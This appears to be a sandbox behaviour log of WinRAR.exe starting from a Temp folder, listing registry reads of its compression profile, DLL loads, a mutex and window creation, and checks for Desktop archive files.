Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, base_address = 0x0 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Local\Temp\winrar.lng, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\winrar.lng, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\riched20.dll, base_address = 0x7fef7980000 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:16 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = VerInfo, size = 12, type = REG_BINARY True 1
Fn
Data
File Create filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, type = file_type True 1
Fn
File Write filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, size = 12 True 1
Fn
Data
Mutex Create mutex_name = WinRAR_Busy True 1
Fn
Window Find class_name = WinRarWindow True 1
Fn
Window Create window_name = WinRAR, class_name = WinRarWindow, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
System Get Time type = Local Time, time = 2019-04-02 16:04:16 (Local Time) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR, value_name = rarkey, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = Priority, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR, value_name = rarreg.key, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Settings.reg, type = file_attributes False 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Extraction False 1
Fn
Keyboard Get Info type = KB_CODEPAGE, result_out = 437 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\5 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcName, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileNames False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = UseRAR, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RAR5, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXModule, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFX, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXIcon, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXLogo, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXElevate, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtFile, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtDataWide, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtTextWide, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtTextData, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolumeSize, data = 0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolSizeMod, data = 2, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolPause, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OldVolNames, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecVolNumber, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Update, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Fresh, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SyncFiles, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Overwrite, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Move, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcRecBin, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcWipe, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WipeIfPassword, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Solid, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Test, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecEnabled, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecSize, data = 4294967293, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Recovery, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EraseDest, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = AddArcOnly, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ClearArc, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Lock, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Method, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSizeLZ, data = 4194304, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSize, data = 33554432, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PasswordData, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EncryptHeaders, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ZipLegacyEncrypt, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OpenShared, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ProcessOwners, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveStreams, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveSymLinks, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveHardLinks, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Background, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WaitForOther, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Shutdown, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = GenerateArcName, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VersionControl, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = BLAKE2, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileCopies, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = QuickOpen, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = GenerateMask, data = yyyymmddhhmmss, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileTimeMode, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileDays, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileHours, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileMinutes, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcTimeOriginal, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcTimeLatest, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = mtime, data = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ctime, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = atime, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsAbs, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsNone, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsAbsDrive, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ImmExec, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArc, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArcDoubleExt, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArcSubfolders, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EmailArcTo, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PackDetails, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\Crypt32.dll, base_address = 0x7fefdc00000 True 1
Fn
Module Get Address module_name = c:\windows\system32\crypt32.dll, function = CryptProtectMemory, address_out = 0x7fefdc316f8 True 1
Fn
Module Get Address module_name = c:\windows\system32\crypt32.dll, function = CryptUnprotectMemory, address_out = 0x7fefdc3171c True 1
Fn
File Get Info filename = Desktop, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop, type = file_attributes False 1
Fn
File Get Info filename = Desktop.rar, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop.rar, type = file_attributes False 1
Fn
File Get Info filename = Desktop.zip, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop.zip, type = file_attributes False 1
Fn
